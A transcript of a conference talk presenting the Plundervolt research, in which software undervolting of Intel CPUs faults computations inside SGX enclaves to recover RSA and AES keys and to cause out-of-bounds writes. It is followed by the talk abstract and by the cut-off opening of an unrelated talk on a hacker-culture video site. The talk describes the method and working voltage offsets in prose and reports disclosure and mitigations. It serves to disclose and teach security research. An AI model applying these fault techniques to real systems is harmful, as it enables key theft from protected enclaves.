I started the paper. That would have saved me an awful lot of time. Thank you to the people on the Internet for making my life a lot easier because what we discovered was there is this magic model specific register. It's called hex 150. This enables you to change the voltage. The people on the Internet did work for me so I know how it works. You first of all tell it, the plain IDX, what it is you want to raise the voltage or lower the voltage. We discovered that the core and the cache are on the same plane. You have to modify them both but it has no effect there together. I guess in the future they'll be separate and then you modify the offset to say I want to raise it by this much or lower it by this much. So I thought let's have a go. Let's write a little bit of code. Here is the code. The smart people amongst you may have noticed something. I suspect even my appalling C, even I would recognize that that loop should never exit. I'm just multiplying the same thing again and again and again and again and again and expecting it to exit. That shouldn't happen. But let's look at what happened. So I'm going to show you what I did. The first thing I'm going to do is I'm going to set the frequency to be one thing because I'm going to play with voltage. If I'm going to play with voltage, I want the frequency to be set. So it's quite easy using CPU power. You set the maximum and the minimum to be 1 GHz. My machine is running at exactly 1 GHz. Now we'll look at the bit of code that you need to undervolt. Again, I didn't do the work. Thank you to the people on the internet for doing this. You put the MSR into the kernel. Let's have a look at the code. Does that look all right? Oh, it does. It looks much better up there. Yes, it's that one line of code. That is the one line of code you need to open. Then we're going to write to it. Again, why is it doing that? We have a touch sensitive screen here. I won't touch it again. That's the line of code that's going to open it. That's how you write to it. Again, the people on the internet did the work for me and told me how I had to write that. What we're going to do here is I'm just going to undervolt. I'm going to undervolt, multiplying dead beef by this really big number. I'm starting at minus 252 millivolts. We're just going to see if I ever get out of this loop. But surely the system would just crash, right? You'd hope so, wouldn't you? Let's see. There we go. We got a fault. I was a bit gobsmacked when that happened because the system didn't crash. That doesn't look too good. The question now is, you show some voltage here, some undervolting zero. What undervolting is actually required to get a bit flip? We did a lot of tests. We didn't just multiply by dead beef. We also multiplied by random numbers. Here I'm going to just generate two random numbers. One is going up to FFFFF. One is going up to FFF. I'm just going to try different, again, I'm going to try undervolting to see if I get different bit flips. Again, I got the same bit flip. I'm getting the same one single bit flip there. Maybe it's only ever going to be one bit flip. I got a different bit flip. Again, a different bit flip. You'll notice there always appear to be bits together next to one another. To answer Daniel's question, I crashed my machine a lot in the process of doing this. I wanted to know what were good values to undervolt out, and here they are. We tried for all the frequencies. We tried what was the base voltage, and then when was the point at which we got the first fault. Once we'd done that, it made everything really easy. We just made sure we didn't go under that and ended up with a kernel panic or the machine crashing. This is already great. I think this looks like it is exploitable. The first thing that you need when you are working on a vulnerability is the name and the logo and maybe a website, everything like that. People on the Internet agree with me. This tweet. Yes. We need a name and a logo. Go on then. What's your idea? I thought this is like it's like row hammer. We are flipping bits, but with voltage, so I call it volt hammer. I already have a logo for it. We're not giving it a logo. I think we need a logo because people can relate more to the images there, to the logo that we have. Reading a word is much more complicated than seeing a logo somewhere. It's better for communication. Make it easier to talk about your vulnerability. The name, same thing. How would you like to call it? Undervolting on Intel to induce flips in multiplications to then run and exploit? No, that's not a good vulnerability name. Speaking of the name, if we choose a fancy name, we might even make it into TV shows like row hammer. The hacker used a DRAM row hammer exploit to gain kernel privileges. Hey, Chuck. I've got something for you. This was in designated survivor in March 2018. This guy just got shot. Hopefully we won't get shot. Actually we have also been working, so my group has been working on row hammer and presented this in 2015 here at CCC in Hamburg back then. It was row hammer.js and we call it root privileges for web apps because we showed that you can do this from JavaScript in a browser. Looks pretty much like this. We hammer the memory a bit and then we see a bit flips in the memory. How does this work? Because maybe for another fault attack, software-based fault attack, the only other software-based fault attack that we know. These are related to DVFS. This is a different effect. What we do here is we look at the DRAM and the DRAM is organized in multiple rows. We will access these rows. These rows consist of so-called cells, which are capacitors and transistors each, and they store one bit of information each. The row buffer, the row size, usually is something like 8 kilobytes and then when you read something, you copy it to the row buffer. It works pretty much like this. You read from a row, you copy it to the row buffer. The problem now is these capacitors leak over time, so you need to refresh them frequently. They have also a maximum refresh interval defined in a standard to guarantee data integrity. The problem is that cells leak fast upon proximate accesses, and that means if you access two locations in proximity to a third location, then the third location might flip a bit without accessing it. This has been exploited in different exploits, so the usual strategies, maybe we can use some of them. The usual strategies here are searching for a page with a bit flip, so you search for it. Then you find some R. There is a flip here. Then you release the page with the flip in the next step. This memory is free. Now you allocate a lot of target pages, for instance, page tables. Then you hope that the target page is placed there. If it's a page table, for instance, like this, and you induce a bit flip, so before it was pointing to user page, then it was pointing to no page at all because we maybe unmapped it. The page that we induce the bit flip now is actually the one storing all the PTEs here, so the one in the middle stored down there. This one now has a bit flip, and then our pointer to our own user page changes due to the bit flip and points to, hopefully, another page table because we filled the memory with page tables. Another direction that we could go here is flipping bits in code. For instance, if you think about a password comparison, you might have a jump equal check here, and a jump equal check, if you flip one bit, it transforms into a different instruction, and fortunately, oh, this already looks interesting, ah, perfect, changing the password check into a password incorrect check. I will always be rude. And yeah, that's basically it. So these are two directions that we might look at. For Rohammer, that's also maybe a question. For Rohammer, why would we even care about other fault attacks? Because Rohammer works on DDR3, it works on DDR4, it works on ECC memory. How does it deal with SGX? Yeah, SGX, yes. So maybe we should first explain what SGX is. SGX is a so-called TE, trusted execution environment on Intel processors, and Intel designed it this way that you have an untrusted part, and this runs on top of an operating system inside an application. And inside the application, you can now create an enclave. And the enclave runs in a trusted part which is supported by the hardware. The hardware is the trust anchor for this trusted enclave. And the enclave, now, you can, from the untrusted part, you can call into the enclave via a call gate pretty much like a system call, and in there, you execute a trusted function. Then you return to this untrusted part, and then you can continue doing other stuff. And the operating system has no direct access to this trusted part. This is also protected against all kinds of other attacks, for instance, physical attacks. If you look at the memory that it uses, maybe I have 16 gigabytes of RAM, then there is a small region for the EPC, the enclave page cache, the memory that enclaves use. And it's encrypted and integrity protected, and I can't temper with it. So for instance, if I want to mount a cold boot attack, pull out the DRAM, put it in another machine, and read out what content it has, I can't do that because it's encrypted and I don't have the keys and the processor. Quite bad. So what happens if we have bit flips in the EPC? Good question. We tried that. The integrity check fails. It locks up the memory controller, which means no further memory accesses whatsoever run through this system. Everything stays where it is, and the system hards, basically. It's no exploit, it's just denial of service. So maybe XGX can save us. So what I want to know is, ROHama clearly failed because of the integrity check, is my attack where I can flip bits, is this going to work inside SGS? I don't think so because they have the integrity protection, right? So what I'm going to do is run the same thing. In the right-hand side is user space, and in the left-hand side is the enclave. As you can see, I'm running it at minus 261 millivolts. No error. Minus 262. No error. Minus two. Fingers crossed, we don't get a kernel panic. Do you see that thing at the bottom? That's a bit flip inside the enclave. Oh, yeah. That's bad. Thank you. Yeah. And it's the same bit flip that I was getting in user space. That is also really interesting. I have an idea. So it's surprising that it works, right? But I have an idea. This is basically doing the same thing as clock screw, but on SGX, right? And I thought maybe you didn't like the previous logo. Maybe it was just too much. So I came up with something more simple. He's come up with a new name. Yes, SGX screw. How do you like it? No. We don't even have an attack. We can't have a logo before we have an attack. The logo is important, right? I mean, how would you present this on a website without a logo? Well, first of all, I need an attack. What am I going to attack with this? I have an idea what we could attack. So for instance, we could attack crypto. RSA. RSA is a crypto algorithm. It's a public key crypto algorithm. And you can encrypt or sign messages. You can send this over an untrusted channel. And then you can also verify. So this is actually a type which should be decrypt there. But verify messages with a public key or decrypt sign messages with a private key. So how does this work? Yeah, basically, it's based on exponentiation modulo a number. And this number is computed from two prime numbers. So for the signature part, which is similar to the decryption, basically, you take a hash of the message and then take it to the power of d modulo n, the public modulos. And then you have the signature. And everyone can verify that this is actually later on, can verify this, because the exponent part is public. So n is also public, so we can later on do this. Now there is one optimization which is quite nice, which is Chinese remainder theorem. And this part is really expensive. It takes a long time. So it's a lot faster if you split this in multiple parts. For instance, if you split it in two parts, you do two of those exponentiations, but with different numbers, with smaller numbers, and then it's cheaper. It takes fewer rounds. And if you do that, you, of course, have to adapt the formula up here to compute the signature, because you now put it together out of the two pieces of the signature that you compute. Okay. So this looks quite complicated, but the point is we want to mount a fault attack on this. So what happens if we fault this? Let's assume we have two signatures which are not identical, right, s and s prime. And we basically only need to know that in one of them a fault occurred. So the first is something, the other is something else. We don't care. But what you see here is that both are multiplied by q plus s2. And if you subtract one from the other, what do you get? You get something multiplied with q. There is something else that is multiplied with q, which is p, and n is public. So what we can do now is we can compute the greatest common divisor of this and n and get q. Okay. So I'm interested to see if I didn't understand the word of that, but I'm interested to see if I can use this to mount an attack. So how am I going to do this? I'll write a little RSA decrypt program. And what I'll do is I'll use the same bit of multiplication that I've been using before. And when I get a bit flip, then I'll do the decryption. All this is happening inside SGX, inside the enclave. So let's have a look at this. First of all, I'll show you the code that I wrote. Again copied from the internet. Thank you. So there it is. I'm going to trigger the fault. I'm going to wait for the trigger of fault. Then I'm going to do a decryption. Let's have a quick look at the code, which should be exactly the same as it was right at the very beginning when we started this. Yeah, there's my dead beef. Written slightly differently, but there's my dead beef. So now this is ever so slightly messy on the screen, but I hope you're going to see this. So minus 239, fine. Still fine. Still fine. I'll just pause there. You can see at the bottom I've written, meh, all fine, if you're wondering. So what we're looking at here is a correct decryption. And you can see inside the enclave, I'm initializing p and I'm initializing q. And those are part of the private key. I shouldn't be able to get those. So 239 isn't really working. Let's try going up to minus 240. Oh, oh, oh, oh, oh. RSA error. RSA error. That's exciting. Okay, so this should work for the attack then. So let's have a look again. I copied somebody's attack on the internet where they very kindly, it's called the Lenshtra attack. And again, I got an output. I don't know what it is because I didn't understand any of that crypto stuff. But let me have a look in the source code and see if that exists anywhere in the source code inside the enclave. It does. I found p. If I found p, I can find q. So just to summarize what I've done, from a bit flip, I have got the private key out of the SGX enclave. And I shouldn't be able to do that. Yes, yes. And I think I have an idea. So you didn't like the previous... Oh, I know where this is going. Yes. You didn't like the previous main. So I came up with something more cute and relatable, maybe. So I thought this is an attack on RSA. So I called it Mufasa. My undervolting fault attack on RSA. That's not even a logo. That's just a picture of a lion. It's sort of a... Disney aren't going to let us use that. Or is it Star Wars now? I don't know. Okay. Okay. So, Daniel, I really enjoyed... I don't think you will like any of the names I suggest, right? Probably not. But I really enjoyed breaking RSA. So what I want to know is, what else can I break? Well... It makes something else so I can break. If you don't like the RSA part, we can also attack other crypto. I mean, there is AES, for instance. AES is a symmetric key crypto algorithm. Again, you encrypt messages, you transfer them over a public channel, this time with both sides having the key. And you can also use that for storage. AES internally uses a 4 times 4 state matrix for... 4 times 4 bytes. And it runs through 10 rounds, which are S-box, which basically replaces a byte by another byte. Some shifting of rows in this matrix, some mixing of the columns, and then the round key is added, which is computed from the AES key that you provide to the algorithm. And if we look at the last three rounds, because we want to again mount a fault attack, and there are differential fault attacks on AES, if you look at the last rounds, because the way of this algorithm works is it propagates changes, differences through this algorithm. If you look at the state matrix, which only has a difference in the top left corner, then this is how the state will propagate through the ninth and tenth round. And you can put up formulas to compute possible values for the state up there. If you have different... If you have encryptions, which only have a difference there in exactly that single state byte. Hmm. Now, how does this work in practice? Well, today everyone is using AES and I, because that's per fast. And again, an instruction set extension by Intel, and it's super fast. Oh, okay. I want to have a go. Right. So let me have a look if I can break some of these AES new instructions. So I'm going to come at this slightly differently. Last time I waited for a multiplication fault, I'm going to do something slightly different. What I'm going to do is put in a loop to AES encryptions, and I wrote this using Intel's code. I should say, I, we, we wrote this using Intel's code. Intel's code, this should never fault. And we know what we're looking for. What we're looking for is a fault in the eighth round. So let's see if we get faults with this. So the first thing is I'm going to start at 2 minus 262 millivolts. What's interesting is that you have to undervolt more when it's cold. So you can tell at what time of day I ran these. Oh, I got fault. I got fault. Oh. I got fault. I actually, where did that? That's actually in the fourth round. I'm, I'm, I'm, I'm, I'm fifth round. I can't do anything with that. You can't do anything again in the fifth round. Can't do anything with that. Um, fifth round again. Oh, oh, we got one. We got one in the eighth round. And so it means I can take these two ciphertexts and I can use the differential fault attack. Um, I actually ran this twice in order to get two pairs of faulty output, um, because it made it so much easier. And again, thank you to somebody on the internet for having written a differential fault analysis attack for me. You don't, you don't need to, but it just makes it easy for the presentation. So I'm now going to compare, let me just pause there a second. Um, I used somebody else's differential fault attack and it gave me in one, for the first pair it gave me 500 keys, possible keys. And for the second, it gave me 200 possible keys. I'm overlapping them. And there was only one key that matched both. And that's the key that came out. And let's just again check inside the source code. Does that key exist? What is the key? And yeah, that is the key. So again, that's not a very good key though. No, I think if you think about randomness, it's as good as any other anyway. Uh, what have I done? I have flipped a bit inside SGX to create a fault in AES new instruction set that has enabled me to get the AES key out of SGX. I shouldn't be able to do that. So, so now that we have multiple attacks, we should think about a logo and a name, right? This one better be good because the other one wasn't very good. No, seriously, we are, we are already soon, we are, we will write this up, send this to conference, people will like it, right? This is, and I already have a name and a logo for it. Come on then. Crypto vault screw hammer. It's like we attack crypto in a vault SGX and it's like SG, like the clock screw and like row hammer and like. I don't think that's very catchy, but let me tell you, it's not just crypto. So we're faulting multiplications, so surely there's another use for this other than crypto and this is where something really interesting happens. For those of you who are really good at C, you can come and explain this to me later. This is a really simple bit of C. All I'm doing is getting an offset of an array and taking the address of that and putting it into a pointer. Why is this interesting? Hmm, it's interesting because I want to know what the compiler does with that. So I'm going to wave my magic wand and what the compiler is going to do is it's going to make this. Why is that interesting? Simple pointer arithmetic. Hmm, well, we know that we can fault multiplications. So we're no longer looking at crypto, we're now looking at just memory. So let's see if I can use this as an attack. So let me try and explain what's going on here. On the right hand side, you can see the undervolting. I'm going to create an enclave and I've put it in debug mode so that I can see what's going on. You can see the size of the enclave because we've got the base and the limit of it. And if we look at that in a diagram, what that's saying is here, if I can write anything at the top above that, that will no longer be encrypted, that will be unencrypted. Okay, let's carry on with that. So let's just write that one statement again and again, that pointer arithmetic again and again and again whilst undervolting and see what happens. Ooh, suddenly it changed and if you look at where it's mapped it to, it's mapped that pointer to memory that is no longer in a side SGX. It's put it into untrusted memory. We'll be just doing the same statement again and again whilst undervolting. Bish, we've written something that was in the enclave, out of the enclave and I'm just going to display the page of memory that we've got there to show you what it was. And there's the one line, it's dead beef and again, I'm just going to look in my source code to see what it was. Yeah, it's, you know, you know, end in this, blah, blah, blah. I have now not even used crypto. I have purely used pointer arithmetic to take something that was stored inside Intel's SGX and moved it into user space where anyone can read it. So yes, I get your point. It's more than just crypto, right? Yeah. It's way beyond that. So we leaked RSA keys, we leaked AS keys. Yeah, we did not just that though, we did memory corruption. Okay. So yeah, okay, crypto vaults for hammer point taken is not the ideal name, but maybe you could come up with something. We need a name and a logo. Okay, pressure's on me then. Right, here we go. So it's got to be due to undervolting because we're undervolting. Maybe we can get a pun on vault and vault in there somewhere. We're stealing something, aren't we? We're corrupting something. Maybe maybe we're plundering something. Yeah. No, let's call it plunder vault. Oh, no, no, no, that's not a good name. No, we need something. This is really not a good name. People will hate this name. Wait, wait, wait, wait, wait. You can read this if you like, Daniel. Okay. I think I get it. No, no, I haven't finished. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Yeah, this is really also a very nice comment. Yes, the quality of the videos. I think you did a very good job there. Thank you. Also the website really good job there. So just to summarize what we've done with plunder vault is it's a new type of attack. It breaks the integrity of SGX. It's within SGX, we're doing stuff we shouldn't be able to. Like AES keys, we leak AES keys. And we are achieving the RSA signature key. Yeah. And yes, we induced memory corruption in bug free code. And we made the enclave write secrets to untrusted memory. This is the paper that's been accepted next year. This is my first paper. Thank you very much. Kit, that's me. Thank you. David Oswald, Flavio Garcia, Jo van Bolk and of course the infamous and Frank Peason. So all that really remains for me to do is to say thank you very much for coming. Wait a second. Wait a second. There's one more thing. I think you overlooked one of the tweets. I edited it here. You didn't see the slide yet. I haven't seen this one. I really like it. It's a slightly ponderous pun on Thunderbolt. Pirate themed logo. Pirate themed logo. I really like it. And if it's a pirate themed logo, don't you think there should be a pirate themed song? Daniel. Have you written a pirate themed song? Go on then, play it. Let's hear the pirate themed song. Yo ho, yo ho, some underho for me. We peel a strip under Jesus' root for bounty and his your hope. We fold the encryption and often we pull for downy and his your hope. Yo ho, yo ho, some underho for me. We fold the signature then we track for downy and his your hope. Or I say we're reasonable, but go attack for downy and his your hope. Yo ho, yo ho, some underho for me. We peel a strip under Jesus' root for bounty and his your hope. We just take a minute to get the key by for downy and his your hope. We know you're relieved that then we say for downy and his your hope. With the fellow patients out here pray for downy and his your hope. Yo ho, yo ho, some underho for me. We peel a strip under Jesus' root for bounty and his your hope. Or I got his tricks with a microcohpash for downy and his your hope. Thanks to... Thanks to Manuel Weber and also to my group at Teograd for volunteering for the choir. And then I mean this is not now the last slide. Thank you for your attention. Thank you for being here. And we would like to answer questions in the Q&A. Thank you for a great talk. And thank you Samuel for the song. All right, if you have questions, please line up on the microphones in the room. First question goes to the single angel of any question from the internet. And not that's not for now. All right, then microphone number four, your question please. Hi, thanks for the great talk. So why does this happen now? I mean, thanks for the explanation for Ron, but it wasn't clear. What's going on there? So to... If you look at circuits for the signal to be ready at the output, the electrons have to travel a bit. If you increase the voltage, things will go faster. So you will have the output signal ready at an earlier point in time. Now, the frequency that you choose for your processor should be related to that. So if you choose the frequency too high, the outputs will not be ready at this circuit. And this is exactly what happens. If you reduce the voltage, the outputs are not ready yet for the next clock cycle. And interestingly, we couldn't fault really short instructions. So anything like an add or an X or it was basically impossible to fault. So they had to be complex instructions that probably weren't finishing by the time the next clock tick arrived. Yeah, thank you. Thanks for the answer. Microphone number four again. Hello, it's a very interesting theoretical approach, I think. But you were capable to break these crypto mechanisms, for example, because you could do zillions of iterations and you are sure to trigger the fault. But in practice, say someone is having a secure conversation, is it practical, even close to possible to break it with that? It totally depends on your threat model. So what can you do with the enclave? If you we are assuming that we are running with root privileges here and a root privileged attacker can certainly run the enclave with certain inputs again and again. If the enclave doesn't have any protection against replay, then certainly we can mount an attack like that. Yes. Thank you. Seenle Angel, your question. Somebody asked if the attack only applies to Intel or to AMD or other architectures as well. Good question. I suspect right now there are people trying this attack on AMD. In the same way that when Clock Screw came out, there were an awful lot of people starting to do stuff on Intel as well. We saw the Clock Screw attack on ARM with frequency. Then we saw ARM with voltage. Now we've seen Intel with voltage. And someone else has done similar, a voltpone has done something very similar to us. And I suspect AMD is the next one. I guess because it's not out there as much, we've tried to do them in the order of scaring people. Scaring as many people as possible as quickly as possible. Thank you for the explanation. Microphone number four. Hi. Thanks for a representation. Can you get similar results by hardware? I mean by tweaking the voltage that you provide to the CPU? Well, I refer you to my earlier answer. I know for a fact that there are people doing this right now with physical hardware seeing what they can do. And I think it will not be long before that paper comes out. Thank you. Thanks. Microphone number one, your question. Sorry. Microphone four again. Sorry. Hi. Thanks for the talk. Two small questions. One, why doesn't anything break inside a GX when you do these tricks? And second one, why when you write outside the enclave's memory, the value is not encrypted? So the enclave is an encrypted area of memory. So when it points to an unencrypted, it's just going to write it to the unencrypted memory. Does that make sense? From the enclave's perspective, none of the memory is encrypted. This is just transparent to the enclave. So if the enclave will write to another memory location, yes, it just won't be encrypted. And what's happening is we're getting flips in the registers, which is why I think we're not getting an integrity check. Because the enclave is completely unaware that anything's even gone wrong. It's got a value in its memory and it's going to use it. The integrity check is only on the memory that you load from RAM. Okay. Microphone number seven. Yeah. Thank you. Interesting work. I was wondering, you showed us the example of the code that wrote outside the enclave memory using simple pointer arithmetic. Have you been able to talk to Intel why this memory access actually happens? I mean, you showed us the output of the program. It crashes. But nevertheless, it writes the result to the resulting memory address. So there must be something wrong like the attack that happened two years ago at the Congress about, yeah, you know, all that stuff. So generally, enclaves can read and write any memory location in their host application. We have also published papers that basically argue that this might not be a good idea, good design decision. But that's the current design. And the reason is that this makes interaction with the enclave very easy. You can just place your payload somewhere in the memory, hand the pointer to the enclave, and the enclave can use the data from there. Maybe copy it into the enclave memory if necessary or directly work on the data. So that's why this memory access to the normal memory region is not illegal. And if you want to know more, you can come and find Daniel afterwards. Okay. Thanks for the answer. Single Angel, the question from the Internet. Yes. And the question came up if how stable the system you're attacking with the hammering is while you're performing the attack. It's really stable. Once I'd been through three months of crashing the computer, I got to a point where I had a really, really good frequency voltage combination. And we did discover on all Intel chips, it was different. So even what looked like an app we bought almost an identical little nook. We put one with exactly the same spec and it had a different sort of frequency voltage model. But once we've done this sort of benchmarking, you could pretty much do any attack without it crashing at all. Yeah. But without this benchmarking, it's true we would often rebuild. Oh, it was a nightmare. Yeah. I wish I'd done that at the beginning. It would have saved me so much time. Thanks again for answering. Microphone number four, your question. Can Intel fix this with a microcode update? So there are different approaches to this. Of course, the quick fix is to remove the access to the MSR, which is of course inconvenient because you can't undervolt your system anymore. So maybe you want to choose whether you want to use SGX or want to have a gaming computer where you undervolt the system or control the voltage from software. But is this a real fix? I don't know. I think there are more vectors, right? Yeah. Well, I'd be interested to see what they're going to do with the next generation of chips. Yeah. Right. Microphone number seven, what's your question? Yeah, similarly to the other question, is there a way you can prevent such attacks when writing code that runs in the secure enclave? Well, no, that's the interesting thing. It's really hard to do because we weren't writing code with bugs. We were just writing normal pointer arithmetic, normal crypto. If anywhere in your code you're using a multiplication, it can be attacked. But of course, you could use fault resistant implementations inside the enclave. Whether that is a practical solution is yet to be determined. Yeah, you could write Jupy code and do comparison things like that. But if, yeah. Okay. Microphone number three, what's your question? Hi, I can't imagine Intel being very happy about this and recently they were under fire for how they were handling coordinated disclosure. So can you summarize experience? They were really nice. They were really nice. We disclosed really early, like before we had all of the attacks. We just had a pock at that point. Yeah. The simple pock, very simple. They've been really nice. They wanted to know what we were doing. They wanted to seal our attacks. I found them lovely. Yes. Well, I'd say that. I mean, they also have interest in making these processes smooth so that vulnerability researchers also report to them. Because if everyone says, oh, this was awful, then they will also not get a lot of reports. But if they do their job well and they did in our case, then of course, it's nice. Okay, microphone number four. We even got a bug bounty. We did get bug bounty. I didn't want to mention that because I haven't told my university yet. Thank you for the funny talk. If I understood you right, it means to really be able to exploit this. You need to do some benchmarking on the machine that you want to exploit. Do you see any way to convert this to a remote exploit? I mean, to me, it seems you need physical access right now because you need to reboot the machine. If you've done benchmarking on an identical machine, I don't think you would have to have physical access. But you would have to make sure that it's really an identical machine. But in the cloud, you will find a lot of identical machines. Okay, microphone number four again. Also, as we said, the temperature plays an important role. You will also find a lot of machines at similar temperatures. There's a lot of stuff we didn't show you. We did start measuring the total amount of clock ticks it took to do maybe 10 RSA encryptions. Then we did start doing very specific timing attacks. But obviously, it's much easier to just do 10,000 of them and hope that one falls. Alright, seems there are no further questions. Thank you very much for your talk. For your research and for answering all the questions. Thank you. Thank you.
We present the next step after Rowhammer, a new software-based fault attack primitive: Plundervolt (CVE-2019-11157). Many processors (including the widespread Intel Core series) expose privileged software interfaces to dynamically regulate processor frequency and operating voltage. We show that these privileged interfaces can be reliably exploited to undermine the system's security. In multiple case studies, we show how the induced faults in enclave computations can be leveraged in real-world attacks to recover keys from cryptographic algorithms (including the AES-NI instruction set extension) or to induce memory safety vulnerabilities into bug-free enclave code. Fault attacks pose a substantial threat to the security of our modern systems, allowing to break cryptographic algorithms or to obtain root privileges on a system. Fortunately, fault attacks have always required local physical access to the system. This changed with the Rowhammer attack (BlackHat USA 2015, CCC 2015), which for the first time enabled an attacker to mount a software-based fault attack. However, as countermeasures against Rowhammer are developed and deployed, fault attacks require local physical access again. In this CCC talk, we present the next step, a long-awaited alternative to Rowhammer, a second software-based fault attack primitive: Plundervolt. Dynamic frequency and voltage scaling features have been introduced to manage ever-growing heat and power consumption in modern processors. Design restrictions ensure frequency and voltage are adjusted as a pair, based on the current load, because for each frequency there is only a certain voltage range where the processor can operate correctly. For this purpose, many processors (including the widespread Intel Core series) expose privileged software interfaces to dynamically regulate processor frequency and operating voltage. In this talk, we show that these privileged interfaces can be reliably exploited to undermine the system's security. We present the Plundervolt attack, in which a privileged software adversary abuses an undocumented Intel Core voltage scaling interface to corrupt the integrity of Intel SGX enclave computations. Plundervolt carefully controls the processor's supply voltage during an enclave computation, inducing predictable faults within the processor package. Consequently, even Intel SGX's memory encryption/authentication technology cannot protect against Plundervolt. In multiple case studies, we show how the induced faults in enclave computations can be leveraged in real-world attacks to recover keys from cryptographic algorithms (including the AES-NI instruction set extension) or to induce memory safety vulnerabilities into bug-free enclave code. We finally discuss why mitigating Plundervolt is not trivial, requiring trusted computing base recovery through microcode updates or hardware changes. We have responsibly disclosed our findings to Intel on June 7, 2019. Intel assigned CVE-2019-11157 to track this vulnerability and refer to mitigations. The scientific paper on Plundervolt will appear at the IEEE Security & Privacy Symposium 2020. The work is the result of a collaboration of Kit Murdock (The University of Birmingham, UK), David Oswald (The University of Birmingham, UK), Flavio D. Garcia (The University of Birmingham, UK), Jo Van Bulck (imec-DistriNet, KU Leuven, Belgium), Daniel Gruss (Graz University of Technology, Austria), and Frank Piessens (imec-DistriNet, KU Leuven, Belgium).
10.5446/53147 (DOI)
Music The speakers that I have on stage today are both anthropologists and they are both experts on hacking culture culture. Today, also they launched their website, hackcure.io, which is also the name of the talk, Hack Curio, decoding the cultures of hacking one video at a time. I welcome Grab Briella, Aka, Biela Coleman, and Pola Bielski. Hello. Hello, hello, hello. Do you hear us? Good evening, CCC. It's so lovely to be here. We are super excited to stand before you here today and present a project we've been working on for the past year or so. That would not have been finished if it were not for this talk. Exactly. So thank you. Exactly. Thanks for forcing us to stand before you. And get away from our desks. Let's drink some wine, have some 11.30pm discussion with you. And there's no better place to launch the project that we're going to show you than at the CCC. So we're super excited to be here. Let's start with the very basics. What is hack curio? What is it that you guys are going to see in the next hour or so? Hack Curio is a website featuring short video clips all related to computer hackers. Now, a bit of a background. My name is Pola Bielski and I am a sociologist. I'm an ethnographer of hacker cultures. I study corporate hacker developers. And for those of you who don't know Biela Coleman, I'm an anthropologist. I also study computer hackers. And we, along with Chris Kelty, have helped to put this website together. Exactly. And in the past year, we've decided to come together and bring all sorts of clips from public talks, from documentaries, from Hollywood films, from memes, advertising, all sorts of sources. We've brought together these videos that also come together with short descriptions by authors, by scholars, by journalists, by people who know something about hacker cultures. And we brought that together all in one place. So call it a museum, call it a compendium, call it a website. And it's a place to really pay homage to you guys. Because hackers come in all shapes and sizes. What it means to hack might mean something to you, but might mean something very different to you. And we decided as anthropologists, we think it's very important to represent a certain culture in a certain way. We're not just hackers and hoodies. It's a really diverse culture. So we're going to talk about that today. Alright, so like how did this project come into being? Like why are we here? Why did we spend the last year doing this? Well, you know, first of all, it wasn't created, I didn't create it because I had this idea in mind. It was created because I started to collect videos for a reason. I'm a professor and I twice a week stand in front of students who are on the internet, on Facebook, maybe buying shoes. And it's like really hard to get their attention. And you know what? I found using videos in class was an amazing way to get them off Facebook and paying attention to moi, to me. Right? So over the years, I just collected a lot of videos, right? Video after video after video after video. And at a certain point, I was like, you know, I have this private collection, semi private collection that I use in class. Why don't I transform it into a public resource? And more so as someone who studied hackers for many years, why don't I kind of make it into a collaborative project? Why don't I tap into the kind of expertise that exists among hackers and journalists and researchers and academics and draw them in? And so I decided to do that, right? And so about a year and a half ago, I brought together a couple of other people like Paula, Chris Kelty, who's another curator, and I said, like, let's get this going. So when we were kind of fashioning the project, we were also thinking like, what are we trying to do with this project, right? You're not my students. I don't see you twice a week. And so we came up with some goals and we don't know if we're going to achieve these goals. The site literally is going live like right now. But this is what we're trying to do with the project. We're trying to chip away at some plastic conceptions and stereotypes of hackers. We know these exist. Can we chip away at them, right? We want to offer new perspectives on what hackers have actually done and what they do. A really important thing which Paula has already kind of mentioned is showcase the diversity of hacking, right? People who do blockchain and free software and security. I mean, there's similarities, but there's also differences. Like, let's try to show this. And while this is not an archive, this is not the Internet Archive, we are trying to kind of preserve bits and bytes of hacker history. So these are the four goals and we do feel that video, right, is a nice medium, a mechanism to achieve these four goals. It's persuasive. It's compelling. It's memorable. It's fun. Like we like to waste time at work on video, right? So we're like, hey, let's add a little persuasive punch to text. And this is why we decided to do it this way. Exactly. So what happens when you click on the site today and how is it organized? We want to show you a little bit of the actual architecture of the site itself. So you can go, when you click on the website, you see certain categories. We've grouped the videos into different categories. Because as you say, there's a huge diversity. So you can see here, Biela is lovely here pointing out the beautiful categories. We've got anti security hackers, blockchain hackers. We've got free and open the software. We've got freaking. We've got hacker depictions. You can look at all sorts of different categories. You go onto a category website and then you have a blurb about what this subculture of hacking is all about or what this category is. Exactly. What the theme is. And then you have all sorts of little videos that last maybe 30 seconds, maybe a few minutes. And under these videos, you would look at the video and then you would have a little bit of a blurb. It's not an essay. It's not a book. It's not some boring academic text. It's supposed to be funny. It's supposed to be for your grandmothers to read. It's supposed to be actually accessible and understandable. So you have the video and the actual text itself. This is how it looks like. And this is maybe some sample of our content itself. What do we have? We've got 42 entries at the moment, which we've collected from, as I said, various different academics with different authors. And by the end of 220, we would love to have around 100 entries. And we'd try to publish around 50 or 20 entries a year. After that. Because it's really brutally hard to edit academics. Exactly. Exactly. And so we've got what you'll find. These are just some examples. We'll get into some really of the videos in just a moment. But for example, you would look at hackers and engineers humming at the Internet Engineering Task Force. Or you'd look at an entry that's about the programming legend of course, Grace Hopper being interviewed by a clue is David Letterman. Maybe you guys have seen this video. A blockchain ad that people see it or you'd say it. You'd ask, is this real? It's kind of a wacky ad. Or is it parody? And when you watch it, you have to know that it is actually quite real. The actor Robert Redford showing off his mad social engineering skills with the help of cakes and balloons. Or how to make sense of why Algerian hacker Hamza Ben Delage, addressed by US government, smiles and how many people from Algeria understand his grin. So this kind of various diversity of really what hacking is really all about. But we're here to get the video party started. Exactly. Finally. So let's get it started. Yeah. A little background. Exactly. Okay. So we'd, yes. Yeah, you start. You start. All right. So we thought it would be a good idea to start with phone freaking because phone freaking really developed at the same time. If not kind of before computer hacking. And we're going to show Joey Bubbles, Joey Gressia, who is, you know, often considered to be the grandfather of phone freaking. So let's go to a video. Make their calls. In the days when calls went through the operators, phone freaking wasn't possible. But as human switchboards were replaced by mechanical systems, different noises were used to trigger the switches. If you had perfect pitch like blind phone freak Joe and Gressia, you could whistle calls through the network. Let's see if I make it this time. This is really hard to do. It sounded like all the tones were present. So it should be ringing about now. Okay. It hit the phone. It just takes a little while. He even showed off his skills for the local media. Now, from his one phone to a town in Illinois and back to his other phone, a thousand mile phone call by Whistley. Joe and Gressia. All right. Very cool. Right. So Joe and Gressia is featured and Joan Donovan, who is like a mad researcher at Harvard 